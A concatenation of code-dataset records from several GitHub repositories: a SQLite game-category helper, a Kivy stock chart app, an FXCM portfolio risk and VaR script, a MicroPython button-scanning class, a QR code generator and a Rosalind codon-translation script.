= con.cursor()\n cur.execute(\"INSERT OR IGNORE INTO GamesCategories VALUES (?, ?, ?)\", (None, game_id, category_id) )\n con.commit()\n return cur.lastrowid\n\ndef add_game_categories_by_id(con, game_id, category_ids):\n speedrunner_log.info('Adding categories for game_id ' + str(game_id) + ': ' + str(category_ids))\n\n entries = []\n for id in category_ids:\n entries.append((None, game_id, id))\n\n cur = con.cursor()\n cur.executemany(\"INSERT OR IGNORE INTO GamesCategories VALUES (?, ?, ?)\", entries )\n con.commit()","repo_name":"jstrub3/speedrunner","sub_path":"db_games_categories.py","file_name":"db_games_categories.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19718434959","text":"# import pickle\n# with open(\"model.pkl\",\"rb\") as f:\n# p=pickle.load(f)\n# f.close()\n# print(\"predicted stock market price of year are:\",p.predict([[2901]]))\n\n# importing pyplot for graph plotting\nfrom matplotlib import pyplot as plt\nimport pickle\n\n# importing pandas and numpy\nimport pandas as pd\nimport numpy as np\nfrom kivy.garden.matplotlib import FigureCanvasKivyAgg\n\n# importing the kivymd screen\nfrom kivymd.uix.screen import MDScreen\n\n\n# importing kivy builder\nfrom kivy.lang import Builder\nimport kivy.garden.matplotlib\n\n\n\n# this is the main class which will\n# render the whole application\nclass Graph(MDScreen):\n\n\tdef __init__(self,string,result):\n\t\tstring=int(string)\n\t\tresult=int(float(result))\n\t\ty1,y2=2000,3000\n\t\tself.str = Builder.load_string(\"\"\"\nMDScreen:\n MDBoxLayout:\n layout:layout\n size_hint:(0.8,0.8)\n pos_hint:{\"center_x\":0.5,\"center_y\":0.5}\n BoxLayout:\n \n id:layout\n\tMDFillRoundFlatButton:\n text: \"Check\"\n md_bg_color: (233/255, 59/255, 129/255,0.5)\n pos_hint:{\"center_x\":0.9,\"center_y\":0.9}\n on_release:app.change_screen1()\n \n\t\t\t\t\t\t\t\t\"\"\")\n\t\tdf=pd.read_csv(\"stock_market.csv\")\n\n\t\timport matplotlib.dates as mdates\n\t\tyears = mdates.YearLocator() # Get every year\n\t\tyearsFmt = mdates.DateFormatter('%Y') # Set year format\n\t\tfig,ax= plt.subplots()# Create subplots to plot graph and control axes\n\t\tax.plot(df['Date'], df['Close'])\n\t\t# Format the ticks\n\t\tax.xaxis.set_major_locator(years)\n\t\tax.xaxis.set_major_formatter(yearsFmt)\n\n\t\tplt.title('Close Stock Price History')\n\t\tplt.xlabel('Date')\n\t\tplt.ylabel('Closing Stock Price in $')\n\t\tif y1>string :\n\t\t\ty1=string/2\n\t\t\ty2=string*2\n\t\telif y2= 1.25: print(\"*** VIX TERM STRUCTURE IN HIGH CONTANGO ***\")\r\n if vol['vix_term_ema'].ix[-1] <= 1.10: print(\"*** INVERTED VIX TERM STRUCTURE ***\")\r\n \r\n return vol\r\n\r\nvol = vol_model()\r\n\r\n\r\ndef exp_data(loc = 'gdrive'):\r\n 'excel', 'gdrive'\r\n if loc == 'excel':\r\n writer = ExcelWriter(\"/home/rem/Documents/FXCM Trading (Dropbox)/PyData.xlsx\")\r\n pr_instr.to_excel(writer, 'Sheet1')\r\n pr_factors.to_excel(writer, 'Sheet2')\r\n ewma_corr_instr.to_excel(writer, 'Sheet3')\r\n ewma_cov_instr.to_excel(writer, 'Sheet4')\r\n vol.to_excel(writer, 'Sheet5')\r\n ewma_cov_fact.to_excel(writer, 'Sheet6')\r\n writer.save()\r\n if loc == 'gdrive':\r\n d2g.upload(pr_instr, gfile='/Trading FXCM/PyData', wks_name='pr_instr')\r\n d2g.upload(pr_factors, gfile='/Trading FXCM/PyData', wks_name='pr_factors')\r\n d2g.upload(ewma_corr_instr, gfile='/Trading FXCM/PyData', wks_name='corr_instr')\r\n d2g.upload(ewma_cov_instr, gfile='/Trading FXCM/PyData', wks_name='cov_instr')\r\n d2g.upload(ewma_cov_fact, 
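# --- Illustrative sketch (editor's addition): the risk functions in this script (vol_model above, portf_risk below) all reduce to combining EWMA moments with portfolio weights. The core computation with toy numbers, not the live FXCM data:\r\n# import numpy as np\r\n# w = np.array([0.4, 0.6])                       # portfolio weights\r\n# cov = np.array([[0.04, 0.01], [0.01, 0.09]])   # (EWMA) covariance of returns\r\n# port_var = float(w.dot(cov).dot(w))            # w' * Sigma * w\r\n# port_std = port_var ** 0.5                     # daily sigma, cf. portf_risk()\r\n# ann_vol = port_std * 252 ** 0.5                # annualized volatility\r\n# var_95 = 1.645 * port_std                      # one-sided 95% Gaussian VaR\r\n# --- end sketch ---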
gfile='/Trading FXCM/PyData', wks_name='cov_fact')\r\n return\r\n\r\nexp_data()\r\n\r\n\r\n#==============================================================================\r\n# Till here just once a day\r\n# From here variable part\r\n#==============================================================================\r\n\r\n\r\n#====================\r\n# WEIGHTS\r\n#====================\r\ndef get_weights(loc = 'cloud'):\r\n 'local', 'cloud' \r\n if loc == 'local': \r\n weights = pd.read_excel('/home/rem/Documents/FXCM Trading (Dropbox)/Weights.xlsx', sheetname='Weights', index_col=0)\r\n if loc == 'cloud':\r\n #weights = pd.read_excel(\"https://1drv.ms/x/s!ApHwtSabAP46itkDw2YNwQHNAzCM4A\", sheetname='Weights', index_col=0)\r\n weights = g2d.download(gfile=\"1bmy2DLu5NV5IP-mo9rGWOyHOx7bEfoglVZmzzuHi5zc\", wks_name=\"Weights\", col_names=True, row_names=True, credentials=None, start_cell='A1')\r\n #print('\\n', 'Weights\\n', weights, '\\n', '\\n')\r\n weights = weights.apply(pd.to_numeric, errors='ignore')\r\n return weights\r\n\r\n#weights = get_weights()\r\n\r\n\r\n#====================\r\n# PORTFOLIO RISK\r\n#====================\r\n# To-do: add mean-var optimization\r\ndef portf_risk():\r\n weights = get_weights()\r\n\r\n # VaR single instruments \r\n VaR_single = 1.645 * ewma_std_instr/100 * abs(weights.NOTIONAL)\r\n VaR_single = np.round(VaR_single, 0)\r\n #print('\\n', \"VaR\\n\", VaR, '\\n')\r\n\r\n # Portfolio expected ret. and vol. \r\n port_expRet = round(np.asscalar(np.dot(ewma_rt_instr.transpose(), weights[[0]])), 1)\r\n port_std = np.dot(np.transpose(np.dot(ewma_cov_instr, weights[[0]])), weights[[0]])\r\n port_std = np.asscalar(np.round(100*port_std**0.5, 1))\r\n port_vol = round(port_std*252**0.5)\r\n #print('\\n', \"Portfolio Risk\\n\", '\\n')\r\n #print(\"Port. Exp. Ret.=\", \"%.1f%%\" % port_expRet, ' ', 'Port. Std. Dev.=', \"%.1f%%\" % port_std, ' ', 'Port. 
Vol.=', \"%.0f%%\" % port_vol, '\\n')\r\n\r\n # Betas of Instruments\r\n var = pd.DataFrame.ewm(rt_instr/100, span=32).var().dropna()['SPX500']\r\n var = np.around(var, 5)\r\n cov = pd.DataFrame.ewm(rt_instr/100, span=32).cov().dropna()\r\n cov = cov.xs(key='SPX500', axis=1).transpose()\r\n cov = np.around(cov, 5)\r\n beta = np.around(cov.div(var, axis='index'), 1)\r\n #print('\\n', 'Instruments Beta\\n', beta.iloc[[-1]], '\\n')\r\n #beta.plot(subplots=True, title=\"INSTRUMENTS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=False) ;\r\n\r\n return (VaR_single, port_expRet, port_std, port_vol, beta.iloc[[-1]], beta) \r\n\r\n#VaR, port_expRet, port_std, port_vol, beta_last, beta = portf_risk()\r\n\r\n\r\n#====================\r\n# FACTOR MODEL\r\n#====================\r\n# Simulated Historical Returns (sim_NAV)\r\n# (This is essentialy a backtest)\r\ndef get_fact_data():\r\n weights = get_weights()\r\n R = rt_instr\r\n W = weights.WEIGHTS\r\n\r\n # Sumproduct\r\n S = R.apply(lambda x: np.asarray(x) * np.asarray(W), axis=1) \r\n S['rt_sim'] = np.round(S.sum(axis=1), 1)\r\n sim_NAV = S['rt_sim']\r\n # Returns\r\n rt_fact_mod = rt_fact.join(sim_NAV) \r\n ewma_rt_fact_mod = np.round(pd.DataFrame.ewm(rt_fact_mod, span=5).mean(), 1)\r\n ewma_rt_fact_mod.rename(columns={'rt_sim':'ewma_sim_NAV'}, inplace=True)\r\n # reordering\r\n ewma_rt_fact_mod = ewma_rt_fact_mod[['ewma_sim_NAV', 'SPY', 'DBP', 'JJC', 'USO', 'UNG', 'UUP', 'FXY']] \r\n #scatter_matrix(factors, alpha=0.8, diagonal='kde') ;\r\n #print('\\n', 'Factors\\n', ewma_rt_fact_mod.tail(2), '\\n') \r\n return (rt_fact_mod, sim_NAV, ewma_rt_fact_mod.tail(71))\r\n\r\n#rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n\r\ndef fact_model():\r\n rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n # Betas of Factors (exp. weighted)\r\n varf = np.round(pd.DataFrame.ewm(rt_fact/100, span=32).var().dropna(), 5)\r\n covf = pd.DataFrame.ewm(rt_fact_mod/100, span=32).cov().dropna()\r\n covf = covf.xs(key='rt_sim', axis=1).transpose()\r\n betaf=pd.DataFrame([covf.SPY/varf.SPY, covf.DBP/varf.DBP, covf.JJC/varf.JJC, covf.USO/varf.USO, covf.UNG/varf.UNG, covf.UUP/varf.UUP, covf.FXY/varf.FXY]).transpose()\r\n betaf = np.round(betaf, 1)\r\n #print('Factors Beta\\n', betaf.iloc[[-1]])\r\n #betaf.plot(subplots=True, title=\"FACTORS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=False) ;\r\n\r\n # Slopes from OLS\r\n fact_mod = ols(formula=\"ewma_sim_NAV~SPY+DBP+JJC+USO+UNG+UUP+FXY\", data=ewma_rt_fact_mod).fit()\r\n #print('\\n', 'Slopes\\n', np.round(fact_mod.params, 1), '\\n')\r\n #print('MSE\\n', np.round(fact_mod.mse_resid, 2))\r\n #print('\\n', 'Factor Model\\n', fact_mod.summary(), '\\n', '\\n')\r\n #fig = plt.figure(figsize=(12,8))\r\n #fig = sm.graphics.plot_partregress_grid(fact_mod, fig=fig)\r\n \r\n # Fact. Model expected ret. and vol.\r\n factMod_expRet = round(np.asscalar(np.dot(ewma_rt_fact.iloc[[-1]], betaf.iloc[[-1]].transpose())+fact_mod.params[0]), 1)\r\n factMod_std = np.dot(betaf.iloc[[-1]], (np.dot(ewma_cov_fact, betaf.iloc[[-1]].transpose())))\r\n factMod_std = np.asscalar(np.round(100*factMod_std**0.5, 1))\r\n #factMod_std = np.round(factMod_std+fact_mod.mse_resid, 1)\r\n factMod_vol = round(factMod_std*252**0.5)\r\n #print(\"Factor Model\\n\")\r\n #print(\"Exp. Ret.=\", \"%.1f%%\" % factMod_expRet, ' ', 'Std. Dev.=', \"%.1f%%\" % factMod_std, ' ', 'Vol.=', \"%.0f%%\" % factMod_vol, ' ', 'Id. 
Risk=', \"%.1f%%\" % fact_mod.mse_resid, '\\n', '\\n')\r\n\r\n return (betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol)\r\n\r\n#betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = fact_model()\r\n\r\n\r\n#====================\r\n# VALUE AT RISK\r\n#====================\r\ndef VaR(returns, alpha = 0.05):\r\n weights = get_weights()\r\n factMod_std = fact_model()[3]\r\n sim_NAV = get_fact_data()[1]\r\n returns = sim_NAV\r\n \r\n # VaR from factor model\r\n var_fact = np.round(1.645*factMod_std/100*weights.EQUITY[0], 0) \r\n\r\n # Historical simulation var\r\n sorted_returns = np.sort(returns)\r\n # Calculate the index associated with alpha\r\n index = int(alpha * len(sorted_returns))\r\n # VaR should be positive\r\n var_hist = np.round(abs(sorted_returns[index])/100*weights.EQUITY[0], 0)\r\n\r\n # CVar Conditional VaR of the returns\r\n # Calculate the total VaR beyond alpha\r\n sum_var = sorted_returns[0]\r\n for i in range(1, index):\r\n sum_var += sorted_returns[i]\r\n # CVaR return the average VaR (should be positive)\r\n cvar_hist = np.round(abs(sum_var/index)/100*weights.EQUITY[0], 0)\r\n #print('\\n', 'VaR (fact.):', var_fact, ' ', 'VaR (hist.):', var_hist, ' ', 'CVaR (hist.):', cvar_hist)\r\n\r\n return (var_fact, var_hist, cvar_hist) \r\n\r\n\r\n\r\n#====================\r\n# STRESS TEST\r\n#====================\r\ndef stress_test(event = 'none', compare = 'SPY', alpha = 0.05):\r\n start = ''\r\n end = ''\r\n \r\n pr = pd.read_csv(\"/home/rem/Documents/FXCM Trading (Dropbox)/Stress Test Data.csv\", index_col=0)\r\n \r\n log_pr = np.log(pr)\r\n log_rt = np.around(log_pr.diff()*100, 1)\r\n log_rt = log_rt.drop(log_rt.index[0]).fillna(0)\r\n\r\n # Events\r\n if event == 'us':\r\n log_rt = log_rt.ix['2011-07-01':'2011-12-30']\r\n pr = pr.ix['2011-07-01':'2011-12-30']\r\n start = datetime.date(2011,7,1)\r\n end = datetime.date(2011,12,30)\r\n event_name = 'US DOWNGRADE'\r\n elif event == 'ch':\r\n log_rt = log_rt.ix['2015-08-01':'2016-04-29'] \r\n pr =pr.ix['2015-08-01':'2016-04-29']\r\n start = datetime.date(2015,8,1)\r\n end = datetime.date(2016,4,29)\r\n event_name = 'CHINA DEVALUATION'\r\n elif event == 'br':\r\n log_rt = log_rt.ix['2016-06-01':'2016-07-15'] \r\n pr = pr.ix['2016-06-01':'2016-07-15']\r\n start = datetime.date(2016,6,1)\r\n end = datetime.date(2016,7,15)\r\n event_name = 'BREXIT'\r\n elif event == 'all':\r\n log_rt1= log_rt.ix['2011-07-01':'2012-03-30']\r\n log_rt2 = log_rt.ix['2015-08-01':'2016-04-29']\r\n log_rt3 = log_rt.ix['2016-06-01':'2016-07-15'] \r\n log_rt = pd.concat([log_rt1, log_rt2, log_rt3])\r\n pr1 = pr.ix['2011-07-01':'2012-03-30']\r\n pr2 =pr.ix['2015-08-01':'2016-04-29']\r\n pr3 = pr.ix['2016-06-01':'2016-07-15']\r\n pr = pd.concat([pr1, pr2, pr3])\r\n start = datetime.date(2011,7,1)\r\n end = datetime.date(2016,7,15)\r\n event_name = 'ALL'\r\n elif event == 'none':\r\n print('No event selected\\n Options: US Downgrade (us), China Devaluation (ch), Brexit (br), all (all)', '\\n')\r\n return\r\n \r\n weights = g2d.download(gfile=\"1bmy2DLu5NV5IP-mo9rGWOyHOx7bEfoglVZmzzuHi5zc\", wks_name=\"Weights\", col_names=True, row_names=True, credentials=None, start_cell='A1')\r\n weights = weights.apply(pd.to_numeric, errors='ignore')\r\n\r\n R = log_rt\r\n W = weights.WEIGHTS\r\n # T-do: Rename Z to rt_NAV \r\n S = R.apply(lambda x: np.asarray(x) * np.asarray(W), axis=1) \r\n S['rt_hist'] = np.round(S.sum(axis=1), 1) \r\n \r\n returns = S.rt_hist\r\n sorted_returns = np.sort(returns)\r\n index = int(alpha * len(sorted_returns))\r\n var_stress 
= np.round(abs(sorted_returns[index])/100*weights.EQUITY[0], 0)\r\n sum_var = sorted_returns[0]\r\n for i in range(1, index):\r\n sum_var += sorted_returns[i]\r\n cvar_stress = np.round(abs(sum_var/index)/100*weights.EQUITY[0], 0)\r\n \r\n # Plot\r\n compare\r\n pr['Portfolio'] = S.rt_hist.cumsum()\r\n pr[[compare, 'Portfolio']].plot(subplots=True, title=event_name, layout=(2, 1), figsize=(10, 5), sharex=True) ;\r\n \r\n print('\\n', 'Stress Test from', start, 'to', end, ' ', '***',event_name,'***', '\\n')\r\n print('VaR (Stress.):', var_stress, ' ', 'CVaR (Stress.):', cvar_stress, '\\n')\r\n\r\n return #(var_stress, cvar_stress) \r\n\r\n\r\n\r\n#====================\r\n# RISK SUMMARY\r\n#====================\r\ndef risk_data():\r\n #get_weights()\r\n weights = get_weights()\r\n \r\n #portf_risk()\r\n VaR_single, port_expRet, port_std, port_vol, beta_last, beta = portf_risk()\r\n \r\n #get_fact_data()\r\n rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n #fact_model()\r\n betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = fact_model()\r\n\r\n #VaR(returns=sim_NAV) \r\n var_fact, var_hist, cvar_hist = VaR(returns=sim_NAV)\r\n\r\n return (weights, VaR_single, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol, var_fact, var_hist, cvar_hist)\r\n\r\n#weights, VaR, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = risk_data()\r\n\r\n\r\ndef risk_summary(plots = False, stress = 'none', ols = False):\r\n risk_data() \r\n weights, VaR_single, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol, var_fact, var_hist, cvar_hist = risk_data()\r\n \r\n print('\\n', '\\n', ' ', 'RISK SUMMARY FOR', datetime.datetime.now().replace(microsecond=0), '\\n', '\\n')\r\n print('WEIGHTS\\n', weights, '\\n', '\\n') \r\n print('SINGLE POSITIONS VALUE AT RISK\\n', '\\n', VaR_single, '\\n', '\\n')\r\n VaR_lim = VaR_single.loc[:, (VaR_single >= 100).any(axis=0)]\r\n print('*** ALERT: POSITIONS EXCEEDING VaR LIMITS ***\\n', '\\n', VaR_lim, '\\n', '\\n', '\\n')\r\n print('PORTFOLIO RISK\\n')\r\n print('Port. Exp. Ret.=', \"%.1f%%\" % port_expRet, ' ', 'Port. Std. Dev.=', \"%.1f%%\" % port_std, ' ', 'Port. Vol.=', \"%.0f%%\" % port_vol, '\\n', '\\n')\r\n print('FACTOR MODEL\\n')\r\n print('Exp. Ret.=', \"%.1f%%\" % factMod_expRet, ' ', 'Std. Dev.=', \"%.1f%%\" % factMod_std, ' ', 'Vol.=', \"%.0f%%\" % factMod_vol, ' ', 'Id. 
Risk=', \"%.1f%%\" % fact_mod.mse_resid, '\\n', '\\n', '\\n')\r\n if port_std >= 5:\r\n print('*** ALERT: DAILY VOLATILITY EXCEEDING LIMIT ***', '\\n', '\\n', '\\n')\r\n print('INSTRUMENTS BETA\\n', '\\n', beta_last, '\\n', '\\n')\r\n print('FACTORS BETA\\n', '\\n', betaf.iloc[[-1]], '\\n', '\\n', '\\n')\r\n print('PORTFOLIO VALUE AT RISK\\n', '\\n', 'VaR (factors):', var_fact, ' ', 'VaR (hist.):', var_hist, ' ', 'CVaR (hist.):', cvar_hist, '\\n', '\\n')\r\n if (var_fact or var_hist) > 800:\r\n print('*** ALERT: PORTFOLIO VaR TOO HIGH ***', '\\n', '\\n')\r\n \r\n # Plots\r\n if plots == True:\r\n beta.tail(100).plot(subplots=True, title=\"INSTRUMENTS BETAS\", layout=(7, 3), figsize=(15, 20), sharex=True) ;\r\n betaf.tail(100).plot(title=\"FACTORS BETAS\", figsize=(15,10)) \r\n #betaf.tail(100).plot(subplots=True, title=\"FACTORS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=True) ;\r\n fig = plt.figure(figsize=(12,10))\r\n fig = sm.graphics.plot_partregress_grid(fact_mod, fig=fig)\r\n \r\n #OLS Summary \r\n if ols == True: \r\n print('\\n', 'Factors Regression\\n', fact_mod.summary(), '\\n', '\\n', '\\n')\r\n\r\n #Stress Test\r\n stress \r\n if stress != 'all':\r\n stress_test(event=stress)\r\n return\r\n # if stress == 'us':\r\n # stress_test(event='us', compare='SPY') \r\n # elif stress == 'ch':\r\n # stress_test(event='ch', compare='SPY') \r\n # elif stress == 'br':\r\n # stress_test(event='br', compare='SPY') \r\n elif stress == 'all':\r\n stress_test(event='us')\r\n stress_test(event='ch') \r\n stress_test(event='br')\r\n return\r\n elif stress == 'none':\r\n print('No Stress-Test selected\\n Options: US Downgrade (us), China Devaluation (ch), Brexit (br), all (all)', '\\n', '\\n')\r\n \r\n return\r\n","repo_name":"Karagul/FXCM-Trading","sub_path":"Trading FXCM - Risk.py","file_name":"Trading FXCM - Risk.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39230861229","text":"# -*- coding:UTF-8 -*-\r\n\r\n'''\r\nMIT License\r\nCopyright (c) 2018 Robin Chen\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n'''\r\n\r\n'''\r\n******************************************************************************\r\n* 文 件:keyboard.py\r\n* 概 述:识别单个机械按键的单击、连击(暂未限制连击次数)、长按、短按动作,并返回事件。\r\n* 版 本:V0.10\r\n* 作 者:Robin Chen\r\n* 日 期:2018年7月26日\r\n* 历 史: 日期 编辑 版本 记录\r\n 2018年7月26日 Robin Chen V0.10 创建文件\r\n`\r\n******************************************************************************'''\r\nclass KEYBOARD:\r\n cont = 0\r\n def __init__(self, _btnKey, _tmBtn, _btnDef = 1, even_djlong = None, even_lj = None, _pull = None):\r\n self.btn = _btnKey\r\n if _pull == \"UP\":\r\n self.btn.init(_btnKey.IN, _btnKey.PULL_UP)\r\n elif _pull == \"DOWN\":\r\n self.btn.init(_btnKey.IN, _btnKey.PULL_DOWN)\r\n else:\r\n self.btn.init(_btnKey.IN)\r\n self.btnDef = _btnDef\r\n self.eve_btnLon = even_djlong\r\n self.evn_Continuous_Clicks = even_lj\r\n self.btnLabDown = 0 # 按钮扫描记次,按下状态\r\n self.btnLabUp = 0 # 按钮扫描记次,弹起状态\r\n self.Continuous_Clicks = 0 # 连续点击次数\r\n self.clock = 10 # 定时器时钟,单位毫秒\r\n _tmBtn.init(freq = (1000 / self.clock))\r\n _tmBtn.callback(self.doBtnScan)\r\n self.staLon = 1 # 长按标志字,1:长按计时,0:长按计次\r\n self.tLon = 3000 # 计时或计次延时,单位毫秒\r\n self.TIME_CONT_CLICKS = 50 # 连击时间间隔,按下和松开的状态保持时间长度,单位,次\r\n\r\n '''*************************************************************************\r\n * 功 能:按键扫描\r\n * 说 明:定时器回调函数,用于识别当前按键是否动作,并判断其动作形式。\r\n * 输入参数:\r\n t : 定时器无参回调函数必备,否则调用不成功。\r\n * 输出参数:None\r\n * 返 回 值:True\r\n **************************************************************************'''\r\n # 扫描按键,定时中断调用函数\r\n def doBtnScan(self, t):\r\n global cont\r\n self.btnLabUp = (self.btnLabUp * int(not(self.btn.value() ^ int(not(self.btnDef))))) + int(not(self.btn.value() ^ int(not(self.btnDef))))\r\n btdown = self.btnLabDown\r\n self.btnLabDown = (self.btnLabDown * int(not(self.btn.value() ^ self.btnDef))) + int(not(self.btn.value() ^ self.btnDef))\r\n\r\n # 长按计时/计次\r\n # t1:按键保持按下的时长\r\n if (self.btnLabDown * self.clock) == self.tLon:\r\n if self.staLon == 1:\r\n if self.eve_btnLon != None:\r\n self.eve_btnLon() # 按键长按事件,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n elif self.staLon == 0:\r\n if self.eve_btnLon != None:\r\n cont += 1\r\n self.eve_btnLon(cont) # 按键长按事件,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n self.btnLabDown = 0\r\n if self.btnLabUp > 5:\r\n cont = 0\r\n\r\n # 连续点击\r\n if (btdown > 5 and btdown < self.TIME_CONT_CLICKS) and self.btnLabUp > 0:\r\n self.Continuous_Clicks += 1\r\n\r\n if (self.btnLabUp > self.TIME_CONT_CLICKS) and (self.Continuous_Clicks > 0) or (self.btnLabDown > self.TIME_CONT_CLICKS) and (self.Continuous_Clicks > 0):\r\n if self.evn_Continuous_Clicks != None:\r\n self.evn_Continuous_Clicks(self.Continuous_Clicks) # 连续点击事件,次数为1时为单击,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n self.Continuous_Clicks = 0\r\n","repo_name":"micropython-Chinese-Community/mpy-lib","sub_path":"keyboard/mechanical-button/single-button/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"31"} +{"seq_id":"15895877710","text":"import pyqrcode\r\nfrom PIL import ImageColor\r\n\r\ncolor = ImageColor.getcolor(input(\"couleur principale en hex : \"), 'RGBA')\r\nlink = input(str('lien ou code : '))\r\nqr = pyqrcode.create(link)\r\n\r\nimg = qr.png(\"code.png\", scale=20, 
module_color=list(color))\r\n\r\nprint(\"Done.\")\r\n","repo_name":"HenryElvis/GenerateQRCode","sub_path":"QRCodeGenerator.py","file_name":"QRCodeGenerator.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23709894705","text":"codon_dic = {\n \"TTT\": \"F\", \n \"CTT\": \"L\", \n \"ATT\": \"I\", \n \"GTT\": \"V\",\n \"TTC\": \"F\", \n \"CTC\": \"L\", \n \"ATC\": \"I\", \n \"GTC\": \"V\",\n \"TTA\": \"L\", \n \"CTA\": \"L\", \n \"ATA\": \"I\", \n \"GTA\": \"V\",\n \"TTG\": \"L\", \n \"CTG\": \"L\", \n \"ATG\": \"M\", \n \"GTG\": \"V\",\n \"TCT\": \"S\", \n \"CCT\": \"P\", \n \"ACT\": \"T\", \n \"GCT\": \"A\",\n \"TCC\": \"S\", \n \"CCC\": \"P\", \n \"ACC\": \"T\", \n \"GCC\": \"A\",\n \"TCA\": \"S\", \n \"CCA\": \"P\", \n \"ACA\": \"T\", \n \"GCA\": \"A\",\n \"TCG\": \"S\", \n \"CCG\": \"P\", \n \"ACG\": \"T\", \n \"GCG\": \"A\",\n \"TAT\": \"Y\", \n \"CAT\": \"H\", \n \"AAT\": \"N\", \n \"GAT\": \"D\",\n \"TAC\": \"Y\", \n \"CAC\": \"H\", \n \"AAC\": \"N\", \n \"GAC\": \"D\",\n \"TAA\": \"Stop\", \n \"CAA\": \"Q\", \n \"AAA\": \"K\", \n \"GAA\": \"E\",\n \"TAG\": \"Stop\", \n \"CAG\": \"Q\", \n \"AAG\": \"K\", \n \"GAG\": \"E\",\n \"TGT\": \"C\", \n \"CGT\": \"R\", \n \"AGT\": \"S\", \n \"GGT\": \"G\",\n \"TGC\": \"C\", \n \"CGC\": \"R\", \n \"AGC\": \"S\", \n \"GGC\": \"G\",\n \"TGA\": \"Stop\", \n \"CGA\": \"R\", \n \"AGA\": \"R\", \n \"GGA\": \"G\",\n \"TGG\": \"W\", \n \"CGG\": \"R\", \n \"AGG\": \"R\", \n \"GGG\": \"G\", \n}\n\n\n\n\n\n#M is the start codon, ATG\ntext = \"\"\"\n>Rosalind_8755\nCGGAGCAACCATATCACATTCCGTGACGGGCCACACTTACCCCCTTGACAACGCCATAAG\nGACGGCCACTGGGAGGCAACGTGTTGACGCTAGCCGCGACCATGGCGACCGTTTTTATGC\nCTGCTCTGACTACATCGCCTGCTACGTCATGCATGGGGTCGTTCTCGATGATTCTCATCC\nTATCCAGTTTCCGAGTGTGCCAAGATAAGGGTGTACAAGCTCGCAGCACCGAGGGGGTAC\nTAGAGCCGACGCTTTCATTGAGCGTAGACCTCTGTTCTTCCATAGTCCCGAATGTGGGGG\nACCGCCTCGGCAGGTGACTCTTGCAGCCTAAGGCTACTACAGTATGCCTCAGCGCCCACG\nACGCCAGTGAGTTATGTGCAGTCGCACTATCTTGGGATCATACAGGTACCAGTCTCGTAC\nCTTGGCGCGCTCGCAGAGATTTCCGATGCCAATTACGGTTGATGTAGTAAAAGCTTAGCT\nAAGCTTTTACTACATCAACCGTAATTGGCATGATCAAGCCTGTCTATCCAAGTGCCGGTA\nCCAAATACACACCGCCTTTGGGGTCATACACGTAGACATCTTAAATCTATATGAAAGTTC\nCCCGAACGATGTAACGCACATCTTTAGAACTGCCTATGGTGCAGGGATGCGCATACTAAT\nACTTTTTGGACAAAGCTGTTTCATCATGGTGTGCCTACGTCCCGTGGTCGGCGAGAATCT\nCGTCTCTTCATACCAAGTGCAAGGGCTCTAGCAAGTAGTTCTGAAATGGATCATGGGTAA\nATGGTAGCACTTTGTTAGACGTGGCACTCTCATGGACCAGTGGACACGGTTATTCCCGCC\nTAATGACACACCTACGAAATGGTCCCGCTGTAGGAAGATCCCCTCATGAGCGTAATTAAA\nGGCTGGAACTGAGGCGAACACATACTAACTGTAACGTCAGTTATATATCAGCATTA\n\"\"\"\n\narray_of_ros = text.split(\">\")[1:]\narray_of_ros_split = []\ndata = []\nfor i in range(len(array_of_ros)):\n array_of_ros[i] = (array_of_ros[i].split(\"\\n\"))\n\nfor i in range(len(array_of_ros)):\n count = 0\n store = \"\"\n for j in range(len(array_of_ros[i])):\n count += 1\n if count != 1:\n store += array_of_ros[i][j]\n data.append(store)\n\n\n\n\ntext_reverse = text[::-1]\ntext_reverse_result = \"\"\nfor i in text_reverse:\n if i == \"A\":\n text_reverse_result = text_reverse_result + \"T\"\n if i == \"T\":\n text_reverse_result = text_reverse_result + \"A\"\n if i == \"C\":\n 